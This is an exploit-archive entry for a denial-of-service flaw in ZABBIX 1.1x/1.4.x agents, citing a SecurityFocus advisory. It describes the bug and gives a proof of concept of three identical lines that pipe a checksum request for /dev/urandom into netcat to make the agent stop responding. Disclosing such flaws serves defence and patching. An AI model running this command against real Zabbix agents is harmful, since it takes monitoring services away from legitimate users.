ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/28244/info


ZABBIX is prone to a denial-of-service vulnerability when handling specially crafted requests for file checksums.

An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users.

echo "vfs.file.cksum[/dev/urandom]" | nc localhost
echo "vfs.file.cksum[/dev/urandom]" | nc localhost
echo "vfs.file.cksum[/dev/urandom]" | nc localhost